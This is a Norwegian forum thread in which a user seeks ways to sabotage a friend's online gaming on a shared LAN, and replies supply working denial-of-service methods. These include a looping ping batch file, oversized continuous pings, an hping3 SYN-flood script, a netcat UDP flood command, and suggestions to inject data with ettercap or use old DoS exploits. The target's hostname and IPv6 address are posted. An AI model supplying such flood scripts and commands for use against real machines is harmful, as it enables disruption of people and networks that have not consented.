Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
  18 1868
Valgfri brukertittel
Kekurikekaka's Avatar
Er en venn av meg som spiller en del CS
Er på land er nå, så skulle gjerne ha tulla litt med han.

Jeg har sett litt på forumet, at å pinge han i loop vil gi han en ekstrem høy ping.

Hvordan funker denne kommandoen?


loop
ping \\Nettverksnavn
goto loop

Og lagre som .bat?

Takker for all hjelp


Vet det er mange andre tråder om dette også, men mange av dem er veldig utdaterte og ingen vits i å ta opp igjen.
Men uansett. Her it goes:

Vet dere om noe mer tull jeg kan gjøre med han/dem? Hels uten at jeg trenger fysisk tilgang til pcen, men dette er mulig så kom med alle idér

Den kjører WinXP og jeg kjører WinVis.
Trigonoceps occipita
vidarlo's Avatar
Donor
Den vil sende en pakke på 64b en gang i sekundet herifra og inn i evigheta. 64 byte i sekundet er 64/12500000-del av linken sin kapasitet, så om du framskaffer roughly 200k pcer som gjer det samtidig vil det vere DDoS-angrep.

Forøvrig, kvifor loop? Ping -c <adresse> så gir den seg ikkje etter fire pakker.

I unix har en -f, som betyr å sende pakker så fort som linken takler. Det kan ta ned et WLAN, pga arkitekturen som er i WLAN, men på en kabla ethernetforbindelse er det maksimalt et irritasjonsmoment.
Tom for megabytes
AtXbYeA's Avatar
Sitat av PureOwnage
Jeg har sett litt på forumet, at å pinge han i loop vil gi han en ekstrem høy ping.
Vis hele sitatet...
Dette fungerte bra når folk brukte modem, ikke på linjer større enn 64Kbit


loop
ping \\Nettverksnavn
goto loop

Og lagre som .bat?
Vis hele sitatet...
Hvorfor gjøre det vanskelig ?

ping ipadresse -t -l 65500

Dog ikke brukbart for noe
[/quote]
Valgfri brukertittel
Kekurikekaka's Avatar
Trådstarter
Så.. Utenom å ødelegge nettverket for alle andre. Noen som vet om hva som høyner pingen til en spesiell pc i nettverket?

Uten noe triksing med router, hub eller noe. Bare fucke opp pingen hans fra min pc.
Trigonoceps occipita
vidarlo's Avatar
Donor
Dra ut kabelen. Eventuelt sende store mengder trafikk, gjerne via UDP siden det er rimelig vanskelig å få vekk.
Tom for megabytes
AtXbYeA's Avatar
Dersom dere ikke er på samme lan engang, Ingenting, dersom dere er på samme lan finnes det visse verktøy som kan ødelegge nettverket (fysisk lookback f.eks).

Ellers, fint lite for å affektere èn PC.
Det som pleier å bli veldig dårlig likt når jeg er på LAN er om noen laster ned. Alle sin ping blir høy og han som laster ned blir peppret og blir truet med å miste internettet fra switchen.

Du kan jo som Vidarlo sa, bruke Unix til å ta ned nettverket

Noe som dog kan ødelegge hans FPS (merk kan) er om det er delte mapper på nettverket og du konsekvent legger over veldig masse ( mange store mapper ) eller tar noen store mapper fra han. Filmer, spil, whatever. Husk at det nesten må bli gjort slik at den overfører 4 - 5 mapper på en gang for å få effekt.
m0b
m0b's Avatar
DonorAdministrator
Tja, dersom du leker litt med ettercap kan du sikkert leke veldig mye med protokollene som CS bruker. Dersom du injecter mye ugyldig data i socketen mellom server og klient antar jeg at du/han vil oppleve meget interessante effekter.
Valgfri brukertittel
Kekurikekaka's Avatar
Trådstarter
Joda, vi er på samme LAN. Men er 6 andre her også, som jeg ikke skal kødde med :P

men Atx: Forklar. Fysisk loopback?

Skulle gjerne hatt noe simpelt som bare forstyrra han.


m0b:
Har ikke sett på det enda, men det er vel for linux. Men skal se på det! takker for all hjelp hittil Har jo Linux LiveCD ^^ Selv om jeg ikke skjønner en skit av det.
På samme fysiske nettverk som andre kan du muligens bruke en god gammeldags SYN flood, om dette ikke er blitt orden på i nyere windows. Finnes sikkert programmer som kan gjøre dette fort om du googler litt, og det pleide å fungere for noen år siden (sist jeg var på LAN).

Fungerer slik at du sender SYN, mottaker svarer SYN-ACK - og du enten aldri svarer ACK (slik at koblingen forblir åpen), eller at du spoofer ip slik at SYN-ACK blir sendt en annen plass. Hvis maskinen reserverer ressurser før ACK vil dette virke, men jeg skal ikke garantere noe.

Vær veldig obs på virus når du søker deg fram etter slike program, om du ikke skriver selv.
Valgfri brukertittel
Kekurikekaka's Avatar
Trådstarter

Kode

# (c) GPL2 fluxist(at)gmail.com
# Usage; hping3 exec ./synflood.htcl <hostname> <dstport>

if {$argc < 2} {
  puts "Required arguments: hostname dstport"
  exit 1
  }

foreach {hostname port} $argv break
set srcport 14000
set target [hping resolve $hostname]
set myaddr [hping outifa $target]

puts "Synflooding $target..."

while {1} {
  hping send "ip(saddr=$myaddr,daddr=$target)+tcp(sport=$srcport,dport=$port,flags=s)"
  }
Det er hva jeg fant.
jeg vet at dette skal lagres om en .htcl fil, men ikke noe mer. Jeg er helt blank på dette! Har lest på wikien der jeg fant kilden, men det sa de ikke stort.

Her er info om han jeg skal tulle med:
\\syntex
fe80::b834:a866:1de4:d18a%8
Det over er ipen hans, som jeg fikk ved å pinge xD
Tom for megabytes
AtXbYeA's Avatar
ipv6 faktisk ? omg skillz

Men siden han kjører windows xp tviler jeg sterkt på at han har implementert ipv6 støtte på sin maskin.
Valgfri brukertittel
Kekurikekaka's Avatar
Trådstarter
Joda. Han her har WinVis. Så han har det samme som meg Det funka ikke å pinge de andre -_-
Du kan jo alltids prøve Jolt2.
Sist endret av klovnen_; 10. august 2007 kl. 21:21.
Trigonoceps occipita
vidarlo's Avatar
Donor
Sitat av klovnen_
Du kan jo alltids prøve Jolt2.
Vis hele sitatet...
* Date: 23-May-00
Ting frå Mai 2000 bruker sjelden å funke. Stortsett er MS rimelig gode på å patche.

Beste tipset er å lese Full Disclosure-mailinglista, og snappe opp DoS-angrep mot vista der. Det kjem frå tid til annan, og eg har m.a sett eit hol i ati-driveren som er ganske nasty. En del der kjem med PoC-kode, en del må du kode sjølv. Som regel er beskrivelsen såpass god at det er rimelig kjapt.

Og nei, eg har ingen intensjoner om å poste url til FD. Greier ikkje folk å finne den, så har dei heller ikkje godt av å lese den!
Gå inn på youtube etc, og åpne opp 5-6 vinduer og la dem upploade seg? ;D
Trigonoceps occipita
vidarlo's Avatar
Donor
Sitat av Restyle
Gå inn på youtube etc, og åpne opp 5-6 vinduer og la dem upploade seg? ;D
Vis hele sitatet...
6*1Mbps=6Mbps=6/100 av 100Mb ethernet. Knapt DoS.

For all del, du greier ikkje å floode en normal 100Mb ethernetlink ved hjelp av nettleseren. Du har alt alt for stort overhead i nettleseren til det. Du kan greie det med ting som netcat -u -p 1337 192.168.0.1 < /dev/zero eller tilsvarande. Det tygg greit gjennom 100Mb båndbredde (>96Mb når eg har testa det...)
om du er så heldig å komer deg in på hans pc, er jo det bare å stille ned raten hans til 100 da, med mindre det er han som laga sereveren, for da vil pngen til dere alle bli piss!

men visst det er non andre som laga serveren, er det bare å sette i gang!

skriv i konsolle; rate 100

EnJOy!
Sitat av leasea
om du er så heldig å komer deg in på hans pc, er jo det bare å stille ned raten hans til 100 da, med mindre det er han som laga sereveren, for da vil pngen til dere alle bli piss!

men visst det er non andre som laga serveren, er det bare å sette i gang!

skriv i konsolle; rate 100

EnJOy!
Vis hele sitatet...
Kan man da justere hvor mye internett den brukeren kan få maks ut av linja?
For det er kjett når andre sitter på linja mi mens jeg spiller bf2.